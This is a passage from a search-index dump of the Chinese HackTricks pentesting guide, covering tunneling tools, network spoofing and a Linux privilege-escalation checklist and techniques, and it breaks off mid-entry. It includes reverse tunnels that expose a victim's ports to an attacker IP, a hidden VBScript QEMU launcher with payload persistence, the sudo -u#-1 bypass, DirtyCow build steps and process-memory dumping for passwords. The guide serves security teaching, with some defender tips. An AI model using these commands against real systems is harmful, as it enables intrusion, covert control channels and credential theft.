0.tcp.ngrok.io:12345\\n# Listen (example): nc -nvlp 4444\\n# Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345 通过HTTP暴露文件 bash ./ngrok http file:///tmp/httpbin/\\n# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/ 嗅探 HTTP 调用 对 XSS, SSRF, SSTI ... 有用 直接从 stdout 或在 HTTP 接口 http://127.0.0.1:4040 。 隧道内部 HTTP 服务 bash ./ngrok http localhost:8080 --host-header=rewrite\\n# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/\\n# With basic auth\\n./ngrok http localhost:8080 --host-header=rewrite --auth=\\"myuser:mysuperpassword\\" ngrok.yaml 简单配置示例 它打开 3 个隧道: 2 个 TCP 1 个 HTTP,静态文件从 /tmp/httpbin/ 暴露 yaml tunnels:\\nmytcp:\\naddr: 4444\\nproto: tcptunne\\nanothertcp:\\naddr: 5555\\nproto: tcp\\nhttpstatic:\\nproto: http\\naddr: file:///tmp/httpbin/","breadcrumbs":"Tunneling and Port Forwarding » 基本用法","id":"1328","title":"基本用法"},"1329":{"body":"Cloudflare的 cloudflared 守护进程可以创建出站隧道,暴露 本地 TCP/UDP 服务 ,而无需入站防火墙规则,使用Cloudflare的边缘作为会合点。当出站防火墙仅允许HTTPS流量而入站连接被阻止时,这非常方便。","breadcrumbs":"Tunneling and Port Forwarding » Cloudflared (Cloudflare Tunnel)","id":"1329","title":"Cloudflared (Cloudflare Tunnel)"},"133":{"body":"ICMP Redirect 是通过发送 ICMP packet type 1 code 5 来实现的,该报文表明 attacker 是到达某个 IP 的最佳路径。然后,当 victim 想要联系该 IP 时,会通过 attacker 转发该 packet。 bash Ettercap\\nicmp_redirect\\nhping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]","breadcrumbs":"Pentesting Network » ICMPRedirect","id":"133","title":"ICMPRedirect"},"1330":{"body":"bash # Expose a local web service listening on 8080\\ncloudflared tunnel --url http://localhost:8080\\n# => Generates https://.trycloudflare.com that forwards to 127.0.0.1:8080","breadcrumbs":"Tunneling and Port Forwarding » 快速隧道一行命令","id":"1330","title":"快速隧道一行命令"},"1331":{"body":"bash # Turn the tunnel into a SOCKS5 proxy on port 1080\\ncloudflared tunnel --url socks5://localhost:1080 --socks5\\n# Now configure proxychains to use 127.0.0.1:1080","breadcrumbs":"Tunneling and Port Forwarding » SOCKS5 透传","id":"1331","title":"SOCKS5 透传"},"1332":{"body":"bash cloudflared tunnel create mytunnel\\ncloudflared tunnel route dns mytunnel internal.example.com\\n# config.yml\\nTunnel: \\ncredentials-file: /root/.cloudflared/.json\\nurl: http://127.0.0.1:8000 开始连接器: bash cloudflared tunnel run mytunnel 因为所有流量都通过主机 出站 443 端口发送,Cloudflared 隧道是绕过入口 ACL 或 NAT 边界的简单方法。请注意,二进制文件通常以提升的权限运行 - 尽可能使用容器或 --user 标志。","breadcrumbs":"Tunneling and Port Forwarding » 使用DNS的持久隧道","id":"1332","title":"使用DNS的持久隧道"},"1333":{"body":"frp 是一个积极维护的 Go 反向代理,支持 TCP、UDP、HTTP/S、SOCKS 和 P2P NAT 穿透 。从 v0.53.0 (2024年5月) 开始,它可以充当 SSH 隧道网关 ,因此目标主机可以仅使用标准的 OpenSSH 客户端启动反向隧道 - 无需额外的二进制文件。","breadcrumbs":"Tunneling and Port Forwarding » FRP (快速反向代理)","id":"1333","title":"FRP (快速反向代理)"},"1334":{"body":"bash # Attacker / server\\n./frps -c frps.toml # listens on 0.0.0.0:7000 # Victim\\n./frpc -c frpc.toml # will expose 127.0.0.1:3389 on frps:5000 # frpc.toml\\nserverAddr = \\"attacker_ip\\"\\nserverPort = 7000 [[proxies]]\\nname = \\"rdp\\"\\ntype = \\"tcp\\"\\nlocalIP = \\"127.0.0.1\\"\\nlocalPort = 3389\\nremotePort = 5000","breadcrumbs":"Tunneling and Port Forwarding » 经典反向 TCP 隧道","id":"1334","title":"经典反向 TCP 隧道"},"1335":{"body":"bash # On frps (attacker)\\nsshTunnelGateway.bindPort = 2200 # add to frps.toml\\n./frps -c frps.toml # On victim (OpenSSH client only)\\nssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000 上述命令将受害者的端口 8080 发布为 attacker_ip:9000 ,无需部署任何额外工具 – 非常适合利用现有资源进行转发。","breadcrumbs":"Tunneling and Port Forwarding » 使用新的 SSH 网关(无 frpc 二进制文件)","id":"1335","title":"使用新的 SSH 网关(无 frpc 二进制文件)"},"1336":{"body":"QEMU 的用户模式网络 (-netdev user) 支持一个名为 hostfwd 的选项,该选项 将 主机 上的 TCP/UDP 端口绑定并转发到 客户机 中 。 当客户机运行完整的 SSH 守护进程时,hostfwd 规则为您提供一个一次性 SSH 跳转盒,完全存在于一个临时 VM 中 – 非常适合隐藏 C2 流量,因为所有恶意活动和文件都保留在虚拟磁盘中。","breadcrumbs":"Tunneling and Port Forwarding » 使用 QEMU 的隐蔽 VM 基于隧道","id":"1336","title":"使用 QEMU 的隐蔽 VM 基于隧道"},"1337":{"body":"powershell # Windows victim (no admin rights, no driver install – portable binaries only)\\nqemu-system-x86_64.exe ^\\n-m 256M ^\\n-drive file=tc.qcow2,if=ide ^\\n-netdev user,id=n0,hostfwd=tcp::2222-:22 ^\\n-device e1000,netdev=n0 ^\\n-nographic • 上面的命令在 RAM 中启动一个 Tiny Core Linux 镜像 (tc.qcow2)。 • Windows 主机上的端口 2222/tcp 透明地转发到来宾内部的 22/tcp 。 • 从攻击者的角度来看,目标仅仅暴露了端口 2222;任何到达该端口的数据包都由在虚拟机中运行的 SSH 服务器处理。","breadcrumbs":"Tunneling and Port Forwarding » 快速一行命令","id":"1337","title":"快速一行命令"},"1338":{"body":"vb \' update.vbs – lived in C:\\\\ProgramData\\\\update\\nSet o = CreateObject(\\"Wscript.Shell\\")\\no.Run \\"stl.exe -m 256M -drive file=tc.qcow2,if=ide -netdev user,id=n0,hostfwd=tcp::2222-:22\\", 0 运行脚本 cscript.exe //B update.vbs 可以保持窗口隐藏。","breadcrumbs":"Tunneling and Port Forwarding » 通过 VBScript 隐秘启动","id":"1338","title":"通过 VBScript 隐秘启动"},"1339":{"body":"由于 Tiny Core 是无状态的,攻击者通常会: 将有效载荷放置到 /opt/123.out 追加到 /opt/bootlocal.sh: sh while ! ping -c1 45.77.4.101; do sleep 2; done\\n/opt/123.out 将 home/tc 和 opt 添加到 /opt/filetool.lst,以便在关机时将有效载荷打包到 mydata.tgz 中。","breadcrumbs":"Tunneling and Port Forwarding » 客户端持久性","id":"1339","title":"客户端持久性"},"134":{"body":"attacker 将解析 victim 请求的一些(或全部)域名。 bash set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on 使用 dnsmasq 配置自己的 DNS bash apt-get install dnsmasqecho \\"addn-hosts=dnsmasq.hosts\\" > dnsmasq.conf #Create dnsmasq.confecho \\"127.0.0.1 domain.example.com\\" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon\\ndig @localhost domain.example.com # Test the configured DNS","breadcrumbs":"Pentesting Network » DNS Spoofing","id":"134","title":"DNS Spoofing"},"1340":{"body":"• 只有两个未签名的可执行文件 (qemu-system-*.exe) 访问磁盘;没有安装驱动程序或服务。 • 主机上的安全产品看到的是 良性的回环流量 (实际的 C2 在虚拟机内部终止)。 • 内存扫描器从未分析恶意进程空间,因为它存在于不同的操作系统中。","breadcrumbs":"Tunneling and Port Forwarding » 为什么这能逃避检测","id":"1340","title":"为什么这能逃避检测"},"1341":{"body":"• 对用户可写路径中的 意外 QEMU/VirtualBox/KVM 二进制文件 发出警报。 • 阻止来自 qemu-system*.exe 的出站连接。 • 寻找在 QEMU 启动后立即绑定的稀有监听端口(2222, 10022, …)。","breadcrumbs":"Tunneling and Port Forwarding » Defender 提示","id":"1341","title":"Defender 提示"},"1342":{"body":"https://github.com/securesocketfunneling/ssf https://github.com/z3APA3A/3proxy","breadcrumbs":"Tunneling and Port Forwarding » 其他检查工具","id":"1342","title":"其他检查工具"},"1343":{"body":"Hiding in the Shadows: Covert Tunnels via QEMU Virtualization Check Point Research – Before ToolShell: Exploring Storm-2603’s Previous Ransomware Operations tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Tunneling and Port Forwarding » 参考文献","id":"1343","title":"参考文献"},"1344":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Checklist - Linux Privilege Escalation » Checklist - Linux Privilege Escalation","id":"1344","title":"Checklist - Linux Privilege Escalation"},"1345":{"body":"","breadcrumbs":"Checklist - Linux Privilege Escalation » 查找Linux本地权限提升向量的最佳工具: LinPEAS","id":"1345","title":"查找Linux本地权限提升向量的最佳工具: LinPEAS"},"1346":{"body":"获取 操作系统信息 检查 PATH ,是否有 可写文件夹 ? 检查 环境变量 ,是否有敏感信息? 搜索 内核漏洞 使用脚本 (DirtyCow?) 检查 sudo版本是否存在漏洞 Dmesg 签名验证失败 更多系统枚举( 日期,系统统计,CPU信息,打印机 ) 枚举更多防御措施","breadcrumbs":"Checklist - Linux Privilege Escalation » 系统信息","id":"1346","title":"系统信息"},"1347":{"body":"列出已挂载 的驱动器 有未挂载的驱动器吗? fstab中有任何凭据吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 驱动器","id":"1347","title":"驱动器"},"1348":{"body":"检查是否安装了 有用的软件 检查是否安装了 易受攻击的软件","breadcrumbs":"Checklist - Linux Privilege Escalation » 已安装软件","id":"1348","title":"已安装软件"},"1349":{"body":"是否有 未知软件在运行 ? 是否有软件以 超出其应有的权限 运行? 搜索 正在运行进程的漏洞 (特别是正在运行的版本)。 你能 修改任何正在运行进程的二进制文件 吗? 监控进程 ,检查是否有任何有趣的进程频繁运行。 你能 读取 一些有趣的 进程内存 (可能保存密码的地方)吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 进程","id":"1349","title":"进程"},"135":{"body":"本地通常存在多条通往系统和网络的路由。在构建了本地网络中 MAC addresses 的列表之后,使用 gateway-finder.py 来识别支持 IPv4 forwarding 的主机。 root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git\\nroot@kali:~# cd gateway-finder/\\nroot@kali:~# arp-scan -l | tee hosts.txt\\nInterface: eth0, datalink type: EN10MB (Ethernet)\\nStarting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)\\n10.0.0.100 00:13:72:09:ad:76 Dell Inc.\\n10.0.0.200 00:90:27:43:c0:57 INTEL CORPORATION\\n10.0.0.254 00:08:74:c0:40:ce Dell Computer Corp. root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99\\ngateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder\\n[+] Using interface eth0 (-I to change)\\n[+] Found 3 MAC addresses in hosts.txt\\n[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]\\n[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]","breadcrumbs":"Pentesting Network » 本地网关","id":"135","title":"本地网关"},"1350":{"body":"PATH 是否被某些cron修改且你可以 写入 ? 在cron作业中有任何 通配符 吗? 是否有某个 可修改的脚本 正在 执行 或在 可修改文件夹 中? 你是否检测到某个 脚本 可能或正在被 频繁执行 ?(每1、2或5分钟)","breadcrumbs":"Checklist - Linux Privilege Escalation » 计划任务/Cron作业?","id":"1350","title":"计划任务/Cron作业?"},"1351":{"body":"有任何 可写的.service 文件吗? 有任何 可写的二进制文件 被 服务 执行吗? 在systemd PATH中有任何 可写文件夹 ?","breadcrumbs":"Checklist - Linux Privilege Escalation » 服务","id":"1351","title":"服务"},"1352":{"body":"有任何 可写的定时器 ?","breadcrumbs":"Checklist - Linux Privilege Escalation » 定时器","id":"1352","title":"定时器"},"1353":{"body":"有任何 可写的.socket 文件吗? 你能 与任何套接字通信 吗? HTTP套接字 中有有趣的信息吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 套接字","id":"1353","title":"套接字"},"1354":{"body":"你能 与任何D-Bus通信 吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » D-Bus","id":"1354","title":"D-Bus"},"1355":{"body":"枚举网络以了解你的位置 打开的端口你之前无法访问 ,现在可以在机器内部获取shell吗? 你能使用 tcpdump 嗅探流量 吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 网络","id":"1355","title":"网络"},"1356":{"body":"通用用户/组 枚举 你有一个 非常大的UID 吗? 机器 易受攻击 吗? 你能 通过你所属的组提升权限 吗? 剪贴板 数据? 密码策略? 尝试 使用 你之前发现的每个 已知密码 登录 每个 可能的 用户 。 也尝试不带密码登录。","breadcrumbs":"Checklist - Linux Privilege Escalation » 用户","id":"1356","title":"用户"},"1357":{"body":"如果你对某个PATH中的文件夹 具有写权限 ,你可能能够提升权限","breadcrumbs":"Checklist - Linux Privilege Escalation » 可写的PATH","id":"1357","title":"可写的PATH"},"1358":{"body":"你能执行 任何带sudo的命令 吗? 你能用它 读取、写入或执行 任何东西作为root吗? ( GTFOBins ) 是否有任何 可利用的SUID二进制文件 ? ( GTFOBins ) sudo 命令是否 受限于 路径 ?你能 绕过 限制吗 ? 没有指定路径的Sudo/SUID二进制文件 ? 指定路径的SUID二进制文件 ? 绕过 LD_PRELOAD漏洞 SUID二进制文件中缺少.so库 来自可写文件夹? 可用的SUDO令牌 ? 你能创建SUDO令牌吗 ? 你能 读取或修改sudoers文件 吗? 你能 修改/etc/ld.so.conf.d/ 吗? OpenBSD DOAS 命令","breadcrumbs":"Checklist - Linux Privilege Escalation » SUDO和SUID命令","id":"1358","title":"SUDO和SUID命令"},"1359":{"body":"是否有任何二进制文件具有 意外的能力 ?","breadcrumbs":"Checklist - Linux Privilege Escalation » 能力","id":"1359","title":"能力"},"136":{"body":"当 DNS 查询失败时,本地主机解析在 Microsoft 系统中依赖 Link-Local Multicast Name Resolution (LLMNR) 和 NetBIOS Name Service (NBT-NS) 。类似地, Apple Bonjour 和 Linux zero-configuration 实现使用 Multicast DNS (mDNS) 在网络中发现主机。由于这些协议未经认证且在 UDP 上以广播方式工作,攻击者可以利用它们将用户重定向到恶意服务。 可以使用 Responder 向主机发送伪造响应,冒充主机查找的服务。 更多关于 如何使用 Responder 冒充服务 的信息请阅读此处。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, and mDNS","id":"136","title":"Spoofing LLMNR, NBT-NS, and mDNS"},"1360":{"body":"是否有任何文件具有 意外的ACL ?","breadcrumbs":"Checklist - Linux Privilege Escalation » ACLs","id":"1360","title":"ACLs"},"1361":{"body":"screen tmux","breadcrumbs":"Checklist - Linux Privilege Escalation » 开放Shell会话","id":"1361","title":"开放Shell会话"},"1362":{"body":"Debian OpenSSL可预测PRNG - CVE-2008-0166 SSH有趣的配置值","breadcrumbs":"Checklist - Linux Privilege Escalation » SSH","id":"1362","title":"SSH"},"1363":{"body":"配置文件 - 读取敏感数据? 写入权限提升? passwd/shadow文件 - 读取敏感数据? 写入权限提升? 检查常见的有趣文件夹 以查找敏感数据 **奇怪的位置/拥有的文件,**你可能有权限访问或更改可执行文件 最近几分钟内修改 Sqlite数据库文件 隐藏文件 PATH中的脚本/二进制文件 Web文件 (密码?) 备份 ? 已知包含密码的文件 :使用 Linpeas 和 LaZagne 通用搜索","breadcrumbs":"Checklist - Linux Privilege Escalation » 有趣的文件","id":"1363","title":"有趣的文件"},"1364":{"body":"修改python库 以执行任意命令? 你能 修改日志文件 吗? Logtotten 漏洞 你能 **修改/etc/sysconfig/network-scripts/**吗? Centos/Redhat 漏洞 你能 写入ini、int.d、systemd或rc.d文件 吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 可写文件","id":"1364","title":"可写文件"},"1365":{"body":"你能 利用NFS提升权限 吗? 你需要 逃离限制性shell 吗? tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Checklist - Linux Privilege Escalation » 其他技巧","id":"1365","title":"其他技巧"},"1366":{"body":"Reading time: 79 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Privilege Escalation","id":"1366","title":"Linux Privilege Escalation"},"1367":{"body":"","breadcrumbs":"Linux Privilege Escalation » 系统信息","id":"1367","title":"系统信息"},"1368":{"body":"让我们开始获取关于正在运行的 OS 的一些信息 bash (cat /proc/version || uname -a ) 2>/dev/null\\nlsb_release -a 2>/dev/null # old, not by default on many systems\\ncat /etc/os-release 2>/dev/null # universal on modern systems","breadcrumbs":"Linux Privilege Escalation » OS 信息","id":"1368","title":"OS 信息"},"1369":{"body":"如果你对 PATH 变量中的任何文件夹具有写入权限 ,你可能能够劫持某些库或二进制文件: bash echo $PATH","breadcrumbs":"Linux Privilege Escalation » Path","id":"1369","title":"Path"},"137":{"body":"浏览器通常使用 Web Proxy Auto-Discovery (WPAD) 协议自动获取代理设置 。这涉及从服务器获取配置(例如通过 URL \\"http://wpad.example.org/wpad.dat\\")。客户端发现该服务器可以通过多种机制发生: 通过 DHCP ,使用特殊的 252 条目来进行发现。 通过 DNS ,在本地域中搜索名为 wpad 的主机名。 通过 Microsoft LLMNR and NBT-NS ,作为 DNS 查询失败时的回退机制。 工具 Responder 利用该协议充当 恶意 WPAD 服务器 。它使用 DHCP、DNS、LLMNR 和 NBT-NS 误导客户端连接到它。要深入了解如何使用 Responder 冒充服务,请 查看此处 。","breadcrumbs":"Pentesting Network » Spoofing WPAD","id":"137","title":"Spoofing WPAD"},"1370":{"body":"环境变量中是否包含有趣的信息、密码或 API 密钥? bash (env || set) 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 环境信息","id":"1370","title":"环境信息"},"1371":{"body":"检查 kernel 版本,查看是否存在可以用来 escalate privileges 的 exploit bash cat /proc/version\\nuname -a\\nsearchsploit \\"Linux Kernel\\" 你可以在这里找到一个不错的 vulnerable kernel list 和一些已经 compiled exploits : https://github.com/lucyoa/kernel-exploits and exploitdb sploits . 其他可以找到一些 compiled exploits 的站点: https://github.com/bwbwbwbw/linux-exploit-binaries , https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack 要从该网站提取所有 vulnerable kernel versions,你可以做: bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep \\"Kernels: \\" | cut -d \\":\\" -f 2 | cut -d \\"<\\" -f 1 | tr -d \\",\\" | tr \' \' \'\\\\n\' | grep -v \\"^\\\\d\\\\.\\\\d$\\" | sort -u -r | tr \'\\\\n\' \' \' 可以帮助查找内核漏洞利用的工具有: linux-exploit-suggester.sh linux-exploit-suggester2.pl linuxprivchecker.py (在受害主机上执行,仅检查 2.x 内核的漏洞利用) 始终 在 Google 上搜索内核版本 ,可能你的内核版本已经出现在某个内核漏洞利用中,这样你就能确定该漏洞利用是否有效。","breadcrumbs":"Linux Privilege Escalation » Kernel exploits","id":"1371","title":"Kernel exploits"},"1372":{"body":"Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 bash # make dirtycow stable\\necho 0 > /proc/sys/vm/dirty_writeback_centisecs\\ng++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/PoCs\\nhttps://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c","breadcrumbs":"Linux Privilege Escalation » CVE-2016-5195 (DirtyCow)","id":"1372","title":"CVE-2016-5195 (DirtyCow)"},"1373":{"body":"基于出现在以下位置的易受攻击的 sudo 版本: bash searchsploit sudo 你可以使用这个 grep 检查 sudo 版本是否存在漏洞。 bash sudo -V | grep \\"Sudo ver\\" | grep \\"1\\\\.[01234567]\\\\.[0-9]\\\\+\\\\|1\\\\.8\\\\.1[0-9]\\\\*\\\\|1\\\\.8\\\\.2[01234567]\\" sudo < v1.28 来自 @sickrov sudo -u#-1 /bin/bash","breadcrumbs":"Linux Privilege Escalation » Sudo 版本","id":"1373","title":"Sudo 版本"},"1374":{"body":"查看 smasher2 box of HTB ,了解如何利用该 vuln 的 示例 bash dmesg 2>/dev/null | grep \\"signature\\"","breadcrumbs":"Linux Privilege Escalation » Dmesg 签名验证失败","id":"1374","title":"Dmesg 签名验证失败"},"1375":{"body":"bash date 2>/dev/null #Date\\n(df -h || lsblk) #System stats\\nlscpu #CPU info\\nlpstat -a 2>/dev/null #Printers info","breadcrumbs":"Linux Privilege Escalation » 更多系统枚举","id":"1375","title":"更多系统枚举"},"1376":{"body":"","breadcrumbs":"Linux Privilege Escalation » 列举可能的防御措施","id":"1376","title":"列举可能的防御措施"},"1377":{"body":"bash if [ `which aa-status 2>/dev/null` ]; then\\naa-status\\nelif [ `which apparmor_status 2>/dev/null` ]; then\\napparmor_status\\nelif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then\\nls -d /etc/apparmor*\\nelse\\necho \\"Not found AppArmor\\"\\nfi","breadcrumbs":"Linux Privilege Escalation » AppArmor","id":"1377","title":"AppArmor"},"1378":{"body":"bash ((uname -r | grep \\"\\\\-grsec\\" >/dev/null 2>&1 || grep \\"grsecurity\\" /etc/sysctl.conf >/dev/null 2>&1) && echo \\"Yes\\" || echo \\"Not found grsecurity\\")","breadcrumbs":"Linux Privilege Escalation » Grsecurity","id":"1378","title":"Grsecurity"},"1379":{"body":"bash (which paxctl-ng paxctl >/dev/null 2>&1 && echo \\"Yes\\" || echo \\"Not found PaX\\")","breadcrumbs":"Linux Privilege Escalation » PaX","id":"1379","title":"PaX"},"138":{"body":"你可以在网络中提供不同的服务,试图 诱骗用户 输入某些 明文凭证 。关于此攻击的 更多信息 见 Spoofing SSDP and UPnP Devices 。","breadcrumbs":"Pentesting Network » Spoofing SSDP and UPnP devices","id":"138","title":"Spoofing SSDP and UPnP devices"},"1380":{"body":"bash (grep \\"exec-shield\\" /etc/sysctl.conf || echo \\"Not found Execshield\\")","breadcrumbs":"Linux Privilege Escalation » Execshield","id":"1380","title":"Execshield"},"1381":{"body":"bash (sestatus 2>/dev/null || echo \\"Not found sestatus\\")","breadcrumbs":"Linux Privilege Escalation » SElinux(安全增强的 Linux)","id":"1381","title":"SElinux(安全增强的 Linux)"},"1382":{"body":"bash cat /proc/sys/kernel/randomize_va_space 2>/dev/null\\n#If 0, not enabled","breadcrumbs":"Linux Privilege Escalation » ASLR","id":"1382","title":"ASLR"},"1383":{"body":"如果你在 docker container 内,你可以尝试从中逃逸: Docker Security","breadcrumbs":"Linux Privilege Escalation » Docker Breakout","id":"1383","title":"Docker Breakout"},"1384":{"body":"检查 what is mounted and unmounted 、挂载位置以及原因。如果有任何未挂载的设备,你可以尝试将其 mount 并检查是否有敏感信息。 bash ls /dev 2>/dev/null | grep -i \\"sd\\"\\ncat /etc/fstab 2>/dev/null | grep -v \\"^#\\" | grep -Pv \\"\\\\W*\\\\#\\" 2>/dev/null\\n#Check if credentials in fstab\\ngrep -E \\"(user|username|login|pass|password|pw|credentials)[=:]\\" /etc/fstab /etc/mtab 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 驱动器","id":"1384","title":"驱动器"},"1385":{"body":"列举有用的二进制文件 bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null 另外,检查是否安装了 任何编译器 。如果需要使用某些 kernel exploit,这很有用,因为建议在将要使用它的机器上(或在一台类似的机器上)进行编译。 bash (dpkg --list 2>/dev/null | grep \\"compiler\\" | grep -v \\"decompiler\\\\|lib\\" 2>/dev/null || yum list installed \'gcc*\' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r \\"/gcc[0-9\\\\.-]\\\\+$\\" 2>/dev/null | grep -v \\"/doc/\\")","breadcrumbs":"Linux Privilege Escalation » 有用的软件","id":"1385","title":"有用的软件"},"1386":{"body":"检查 已安装的软件包和服务的版本 。可能存在旧的 Nagios 版本(例如),可以被利用来进行 escalating privileges… 建议手动检查更可疑的已安装软件的版本。 bash dpkg -l #Debian\\nrpm -qa #Centos If you have SSH access to the machine you could also use openVAS to check for outdated and vulnerable software installed inside the machine. [!NOTE] > 请注意,这些命令会显示大量大多无用的信息,因此建议使用 OpenVAS 或类似工具来检查已安装的软件版本是否容易受到已知 exploits 的利用。","breadcrumbs":"Linux Privilege Escalation » Vulnerable Software Installed","id":"1386","title":"Vulnerable Software Installed"},"1387":{"body":"查看正在执行的 哪些进程 ,并检查是否有任何进程拥有 比它应有的更多权限 (例如由 root 运行的 tomcat?) bash ps aux\\nps -ef\\ntop -n 1 始终检查是否有可能的 electron/cef/chromium debuggers 正在运行,你可以滥用它来提升权限 。 Linpeas 通过检查进程命令行中的 --inspect 参数来检测它们。 另外 检查你对进程二进制文件的权限 ,也许你可以覆盖某些可执行文件。","breadcrumbs":"Linux Privilege Escalation » Processes","id":"1387","title":"Processes"},"1388":{"body":"你可以使用像 pspy 这样的工具来监控进程。这在识别经常被执行或在满足一组条件时触发的易受攻击进程时非常有用。","breadcrumbs":"Linux Privilege Escalation » 进程监控","id":"1388","title":"进程监控"},"1389":{"body":"一些服务器服务会在内存中以 明文 保存凭据。 通常你需要 root privileges 来读取属于其他用户的进程内存,因此这通常在你已经是 root 并想发现更多凭据时更有用。 但是,记住 作为普通用户你可以读取你自己拥有的进程的内存 。 warning 注意如今大多数机器 默认不允许 ptrace ,这意味着你无法转储属于其他用户的进程(如果你是非特权用户)。 文件 /proc/sys/kernel/yama/ptrace_scope 控制 ptrace 的可访问性: kernel.yama.ptrace_scope = 0 : 所有进程都可以被调试,只要它们具有相同的 uid。这是 ptracing 的传统工作方式。 kernel.yama.ptrace_scope = 1 : 只有父进程可以被调试。 kernel.yama.ptrace_scope = 2 : 只有管理员可以使用 ptrace,因为它需要 CAP_SYS_PTRACE 能力。 kernel.yama.ptrace_scope = 3 : 不能用 ptrace 跟踪任何进程。设置后需要重启才能再次启用 ptrace。 GDB 如果你可以访问某个 FTP 服务(例如)的内存,你可以获取 Heap 并在其中搜索凭据。 bash gdb -p \\n(gdb) info proc mappings\\n(gdb) q\\n(gdb) dump memory /tmp/mem_ftp \\n(gdb) q\\nstrings /tmp/mem_ftp #User and password GDB 脚本 dump-memory.sh #!/bin/bash\\n#./dump-memory.sh \\ngrep rw-p /proc/$1/maps \\\\\\n| sed -n \'s/^\\\\([0-9a-f]*\\\\)-\\\\([0-9a-f]*\\\\) .*$/\\\\1 \\\\2/p\' \\\\\\n| while read start stop; do \\\\\\ngdb --batch --pid $1 -ex \\\\\\n\\"dump memory $1-$start-$stop.dump 0x$start 0x$stop\\"; \\\\\\ndone /proc/$pid/maps & /proc/$pid/mem 对于给定的进程 ID, maps 显示该进程的内存如何映射 的虚拟地址空间;它还显示 每个映射区域的权限 。该 mem 伪文件 暴露了进程的内存本身 。从 maps 文件我们可以知道哪些 内存区域是可读的 以及它们的偏移。我们使用这些信息 在 mem 文件中定位并转储所有可读区域 到一个文件。 bash procdump()\\n(\\ncat /proc/$1/maps | grep -Fv \\".so\\" | grep \\" 0 \\" | awk \'{print $1}\' | ( IFS=\\"-\\"\\nwhile read a b; do\\ndd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \\\\\\nskip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of=\\"$1_mem_$a.bin\\"\\ndone )\\ncat $1*.bin > $1.dump\\nrm $1*.bin\\n) /dev/mem /dev/mem 提供对系统的 物理 内存的访问,而不是虚拟内存。内核的虚拟地址空间可以使用 /dev/kmem 访问。 通常,/dev/mem 仅对 root 和 kmem 组可读。 strings /dev/mem -n10 | grep -i PASS","breadcrumbs":"Linux 